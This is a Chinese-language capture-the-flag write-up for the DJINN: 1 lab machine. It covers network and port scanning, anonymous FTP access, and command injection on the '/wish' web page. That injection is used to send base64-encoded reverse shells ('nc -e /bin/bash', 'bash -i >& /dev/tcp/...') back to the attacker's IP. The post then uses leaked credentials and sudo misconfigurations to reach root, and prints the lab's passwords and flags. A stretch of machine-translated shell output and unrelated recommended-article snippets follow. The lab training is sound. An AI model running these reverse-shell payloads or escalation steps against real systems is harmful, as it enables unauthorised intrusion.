红队打靶练习:DJINN: 1-程序员宅基地
目录
信息收集
1、arp
┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.151 00:50:56:2f:10:ba VMware, Inc.
192.168.12.254 00:50:56:e5:6e:0b VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.342 seconds (109.31 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.151 00:50:56:2f:10:ba 1 60 VMware, Inc.
192.168.12.254 00:50:56:e5:6e:0b 1 60 VMware, Inc.
3、nmap
端口探测
┌──(root㉿ru)-[~]
└─# nmap -p- 192.168.12.151 --min-rate 10000 -oA /root/kali/port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 07:52 CST
Nmap scan report for 192.168.12.151
Host is up (0.0020s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:50:56:2F:10:BA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.89 seconds
┌──(root㉿ru)-[~/kali]
└─# cat port.nmap | head -n 9 | tail -n 4 | awk '{print $1}' | awk -F "/" '{print $1}' | xargs -n 4 | sed 's/ /,/g'
21,22,1337,7331
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 21,22,1337,7331 192.168.12.151 --min-rate 10000 -oA XX
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-02 07:55 CST
Nmap scan report for 192.168.12.151
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.12.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp closed ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '+', 5)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '-', 2)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-title: Lost in space
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94SVN%I=7%D=1/2%Time=659350F9%P=x86_64-pc-linux-gnu%r(
SF:NULL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20_
SF:_\x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x
SF:20__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'
SF:_\x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_
SF:\x20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\
SF:|\x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20mat
SF:hs\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x
SF:20you\x20your\x20gift\.\n\(6,\x20'\+',\x205\)\n>\x20")%r(RPCCheck,1BC,"
SF:\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20
SF:_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20__
SF:_\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20
SF:_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_
SF:\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|
SF:\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's
SF:\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer
SF:\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20y
SF:our\x20gift\.\n\(3,\x20'-',\x202\)\n>\x20");
MAC Address: 00:50:56:2F:10:BA (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 4.4 (93%), Linux 5.1 (92%), Linux 3.2 - 4.9 (90%), Linux 4.0 (89%), Linux 3.16 - 4.6 (89%), Linux 4.10 (89%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.13 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.12.151
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.31 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.151:7331
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.151
+ Target Hostname: 192.168.12.151
+ Target Port: 7331
+ Start Time: 2024-01-02 07:58:19 (GMT8)
---------------------------------------------------------------------------
+ Server: Werkzeug/0.16.0 Python/2.7.15+
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.15+ appears to be outdated (current is at least 3.9.6).
+ OPTIONS: Allowed HTTP Methods: HEAD, OPTIONS, GET .
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2024-01-02 07:58:42 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.151:7331
WhatWeb report for http://192.168.12.151:7331
Status : 200 OK
Title : Lost in space
IP : 192.168.12.151
Country : RESERVED, ZZ
Summary : Bootstrap, HTML5, HTTPServer[Werkzeug/0.16.0 Python/2.7.15+], JQuery, Python[2.7.15+], Script, Werkzeug[0.16.0]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Werkzeug/0.16.0 Python/2.7.15+ (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Python ]
Python is a programming language that lets you work more
quickly and integrate your systems more effectively. You
can learn to use Python and see almost immediate gains in
productivity and lower maintenance costs.
Version : 2.7.15+
Website : http://www.python.org/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ Werkzeug ]
Werkzeug is a WSGI utility library for Python.
Version : 0.16.0
Website : http://werkzeug.pocoo.org/
HTTP Headers:
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 2266
Server: Werkzeug/0.16.0 Python/2.7.15+
Date: Mon, 01 Jan 2024 23:59:30 GMT
6、小结
21/tcp open ftp vsftpd 3.0.3
22/tcp closed ssh
1337/tcp open waste?
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
开放了21端口;22端口是关闭的状态,可能需要敲门服务才能打开;1337端口开放的可能是waste文件共享协议;7331端口开放的是web服务!
端口探测
gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.12.151:7331 -x php,txt,html.bak -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.151:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wish (Status: 200) [Size: 385]
/genie (Status: 200) [Size: 1676]
WEB
7331端口
在源码处找到了类似于用户名和密码,anonymous不就是ftp匿名登陆的用户名吗?
wish目录
输入id跳到/genie目录,并且显示403!
现在似乎ftp是突破口,我们尝试登录!
integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"></script>
尝试匿名登陆!
ftp利用
┌──(root㉿ru)-[~/kali]
└─# ftp
ftp> open 192.168.12.151
Connected to 192.168.12.151.
220 (vsFTPd 3.0.3)
Name (192.168.12.151:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||20136|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 21 2019 .
drwxr-xr-x 2 0 115 4096 Oct 21 2019 ..
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp>
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||61287|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
229 Entering Extended Passive Mode (|||5320|)
150 Opening BINARY mode data connection for creds.txt (11 bytes).
100% |******************************************************************************************************************************************************| 11 4.15 KiB/s 00:00 ETA
226 Transfer complete.
11 bytes received in 00:00 (3.43 KiB/s)
ftp> get game.txt
local: game.txt remote: game.txt
229 Entering Extended Passive Mode (|||21851|)
150 Opening BINARY mode data connection for game.txt (128 bytes).
100% |******************************************************************************************************************************************************| 128 448.02 KiB/s 00:00 ETA
226 Transfer complete.
128 bytes received in 00:00 (170.06 KiB/s)
ftp> get message.txt
local: message.txt remote: message.txt
229 Entering Extended Passive Mode (|||40078|)
150 Opening BINARY mode data connection for message.txt (113 bytes).
100% |******************************************************************************************************************************************************| 113 227.52 KiB/s 00:00 ETA
226 Transfer complete.
113 bytes received in 00:00 (123.57 KiB/s)
ftp>
┌──(root㉿ru)-[~/kali]
└─# ls
creds.txt game.txt message.txt port.gnmap port.nmap port.xml reports XX.gnmap XX.nmap XX.xml
┌──(root㉿ru)-[~/kali]
└─# cat creds.txt
nitu:81299
┌──(root㉿ru)-[~/kali]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
┌──(root㉿ru)-[~/kali]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
┌──(根㉿ru)-[~/kali]
└─# cat信用.txt
尼图:81299
┌──(根㉿ru)-[~/kali]
└─# 猫游戏.txt
哦,我忘了告诉你我已经在1337端口为你设置了一个游戏。看看你是否能找到
最后一级并获得奖品。
┌──(根㉿ru)-[~/kali]
└─# cat消息.txt
@nitish81299我要去度假几天,请照顾好所有的工作。
不要搞砸任何事情。
1337端口
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.151 1337
Trying 192.168.12.151...
Connected to 192.168.12.151.
Escape character is '^]'.
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(4, '+', 5)
> 9
(4, '/', 7)
> 0.5
(2, '+', 2)
要回答一千个问题才能给我提示!太多了吧,我们先去利用别的吧!
反弹shell
这个页面绝对不是没用的的!我们尝试反弹shell。
可以看到,已经回显出来了!页面应该有图片的,应该是靶机启动问题,没有加载出来!不影响!
nc -e /bin/bash 192.168.12.128 5656
报错了!我们编码一下!
payload
echo "bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTIuMTI4IDU2NTY=" | base64 -d
因为可以进行命令执行,所以我们使用这个命令!
我们构造另一个payload进行反弹shell。
paylaod
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEyOC81NjU2IDA+JjE=" | base64 -d | bash
bash -i >& /dev/tcp/192.168.12.128/5656 0>&1
在后面加上bash直接执行!不要忘了提前开启监听!
┌──(root㉿ru)-[~/kali]
└─# nc -nlvp 5656
listening on [any] 5656 ...
connect to [192.168.12.128] from (UNKNOWN) [192.168.12.151] 60988
bash: cannot set terminal process group (682): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$
提权
系统信息收集
www-data@djinn:/home$ whereis python
whereis python
python: /usr/bin/python2.7 /usr/bin/python /usr/bin/python3.6m-config /usr/bin/python3.6 /usr/bin/python3.7 /usr/bin/python3.6-config /usr/bin/python3.6m /usr/bin/python3.7m /usr/bin/python2.7-config /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /usr/lib/python3.8 /etc/python2.7 /etc/python /etc/python3.6 /etc/python3.7 /usr/local/lib/python2.7 /usr/local/lib/python3.6 /usr/local/lib/python3.7 /usr/include/python2.7 /usr/include/python3.6 /usr/include/python3.7 /usr/include/python3.6m /usr/include/python3.7m /usr/share/python /usr/share/man/man1/python.1.gz
www-data@djinn:/home$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@djinn:/home$ ls
ls
nitish sam
www-data@djinn:/home$ cat /etc/passwd | grep "/home" | grep -v nologin
cat /etc/passwd | grep "/home" | grep -v nologin
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
nitish:x:1001:1001::/home/nitish:/bin/bash
www-data@djinn:/opt/80$ ls
ls
app.py app.pyc static templates
www-data@djinn:/opt/80$ ls -al
ls -al
total 24
drwxr-xr-x 4 www-data www-data 4096 Nov 17 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw-r--r-- 1 www-data www-data 1323 Nov 13 2019 app.py
-rw-r--r-- 1 www-data www-data 1846 Nov 14 2019 app.pyc
drwxr-xr-x 5 www-data www-data 4096 Nov 13 2019 static
drwxr-xr-x 2 www-data www-data 4096 Nov 14 2019 templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
我们根据提示需要找到nitish的密码。就在 "/home/nitish/.dev/creds.txt" 这里!
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
www-data@djinn:/home/nitish/.dev$
www-data@djinn:/home/nitish/.dev$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:~/.dev$
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
横向提权
nitish@djinn:~/.dev$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
这里提示我们只能sam用户可以进行本地提权。我们还需要横向提权!
nitish@djinn:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Nov 14 2019 .
drwxr-xr-x 23 root root 4096 Nov 11 2019 ..
drwxr-xr-x 5 nitish nitish 4096 Nov 12 2019 nitish
drwxr-x--- 4 sam sam 4096 Nov 14 2019 sam
我们想办法登录到sam用户!
nitish@djinn:/usr$ sudo -u sam genie -cmd new
sudo -u sam genie -cmd new
my man!!
$ whoami
whoami
sam
$
$ bash
bash
sam@djinn:/home/sam$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
本地提权
sam@djinn:/home/sam$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
我们选择第二个,最简单的!猜数字!
sam@djinn:/home/sam$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
lago proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Tue Jan 2 07:31:08 IST 2024
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
这里的猜数字,不是单纯的猜数字,我们从一到一百,太多了!试了半天,看别的博主,只需要输入数字的英文简写即可!我们直接输入“数字”(num)即可!太离谱了!脑筋急转弯?
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
智能推荐
c# 调用c++ lib静态库_c#调用lib-程序员宅基地
文章浏览阅读2w次,点赞7次,收藏51次。四个步骤1.创建C++ Win32项目动态库dll 2.在Win32项目动态库中添加 外部依赖项 lib头文件和lib库3.导出C接口4.c#调用c++动态库开始你的表演...①创建一个空白的解决方案,在解决方案中添加 Visual C++ , Win32 项目空白解决方案的创建:添加Visual C++ , Win32 项目这......_c#调用lib
deepin/ubuntu安装苹方字体-程序员宅基地
文章浏览阅读4.6k次。苹方字体是苹果系统上的黑体,挺好看的。注重颜值的网站都会使用,例如知乎:font-family: -apple-system, BlinkMacSystemFont, Helvetica Neue, PingFang SC, Microsoft YaHei, Source Han Sans SC, Noto Sans CJK SC, W..._ubuntu pingfang
html表单常见操作汇总_html表单的处理程序有那些-程序员宅基地
文章浏览阅读159次。表单表单概述表单标签表单域按钮控件demo表单标签表单标签基本语法结构<form action="处理数据程序的url地址“ method=”get|post“ name="表单名称”></form><!--action,当提交表单时,向何处发送表单中的数据,地址可以是相对地址也可以是绝对地址--><!--method将表单中的数据传送给服务器处理,get方式直接显示在url地址中,数据可以被缓存,且长度有限制;而post方式数据隐藏传输,_html表单的处理程序有那些
PHP设置谷歌验证器(Google Authenticator)实现操作二步验证_php otp 验证器-程序员宅基地
文章浏览阅读1.2k次。使用说明:开启Google的登陆二步验证(即Google Authenticator服务)后用户登陆时需要输入额外由手机客户端生成的一次性密码。实现Google Authenticator功能需要服务器端和客户端的支持。服务器端负责密钥的生成、验证一次性密码是否正确。客户端记录密钥后生成一次性密码。下载谷歌验证类库文件放到项目合适位置(我这边放在项目Vender下面)https://github.com/PHPGangsta/GoogleAuthenticatorPHP代码示例://引入谷_php otp 验证器
【Python】matplotlib.plot画图横坐标混乱及间隔处理_matplotlib更改横轴间距-程序员宅基地
文章浏览阅读4.3k次,点赞5次,收藏11次。matplotlib.plot画图横坐标混乱及间隔处理_matplotlib更改横轴间距
docker — 容器存储_docker 保存容器-程序员宅基地
文章浏览阅读2.2k次。①Storage driver 处理各镜像层及容器层的处理细节,实现了多层数据的堆叠,为用户 提供了多层数据合并后的统一视图②所有 Storage driver 都使用可堆叠图像层和写时复制(CoW)策略③docker info 命令可查看当系统上的 storage driver主要用于测试目的,不建议用于生成环境。_docker 保存容器
随便推点
网络拓扑结构_网络拓扑csdn-程序员宅基地
文章浏览阅读834次,点赞27次,收藏13次。网络拓扑结构是指计算机网络中各组件(如计算机、服务器、打印机、路由器、交换机等设备)及其连接线路在物理布局或逻辑构型上的排列形式。这种布局不仅描述了设备间的实际物理连接方式,也决定了数据在网络中流动的路径和方式。不同的网络拓扑结构影响着网络的性能、可靠性、可扩展性及管理维护的难易程度。_网络拓扑csdn
JS重写Date函数,兼容IOS系统_date.prototype 将所有 ios-程序员宅基地
文章浏览阅读1.8k次,点赞5次,收藏8次。IOS系统Date的坑要创建一个指定时间的new Date对象时,通常的做法是:new Date("2020-09-21 11:11:00")这行代码在 PC 端和安卓端都是正常的,而在 iOS 端则会提示 Invalid Date 无效日期。在IOS年月日中间的横岗许换成斜杠,也就是new Date("2020/09/21 11:11:00")通常为了兼容IOS的这个坑,需要做一些额外的特殊处理,笔者在开发的时候经常会忘了兼容IOS系统。所以就想试着重写Date函数,一劳永逸,避免每次ne_date.prototype 将所有 ios
如何将EXCEL表导入plsql数据库中-程序员宅基地
文章浏览阅读5.3k次。方法一:用PLSQL Developer工具。 1 在PLSQL Developer的sql window里输入select * from test for update; 2 按F8执行 3 打开锁, 再按一下加号. 鼠标点到第一列的列头,使全列成选中状态,然后粘贴,最后commit提交即可。(前提..._excel导入pl/sql
Git常用命令速查手册-程序员宅基地
文章浏览阅读83次。Git常用命令速查手册1、初始化仓库git init2、将文件添加到仓库git add 文件名 # 将工作区的某个文件添加到暂存区 git add -u # 添加所有被tracked文件中被修改或删除的文件信息到暂存区,不处理untracked的文件git add -A # 添加所有被tracked文件中被修改或删除的文件信息到暂存区,包括untracked的文件...
分享119个ASP.NET源码总有一个是你想要的_千博二手车源码v2023 build 1120-程序员宅基地
文章浏览阅读202次。分享119个ASP.NET源码总有一个是你想要的_千博二手车源码v2023 build 1120
【C++缺省函数】 空类默认产生的6个类成员函数_空类默认产生哪些类成员函数-程序员宅基地
文章浏览阅读1.8k次。版权声明:转载请注明出处 http://blog.csdn.net/irean_lau。目录(?)[+]1、缺省构造函数。2、缺省拷贝构造函数。3、 缺省析构函数。4、缺省赋值运算符。5、缺省取址运算符。6、 缺省取址运算符 const。[cpp] view plain copy_空类默认产生哪些类成员函数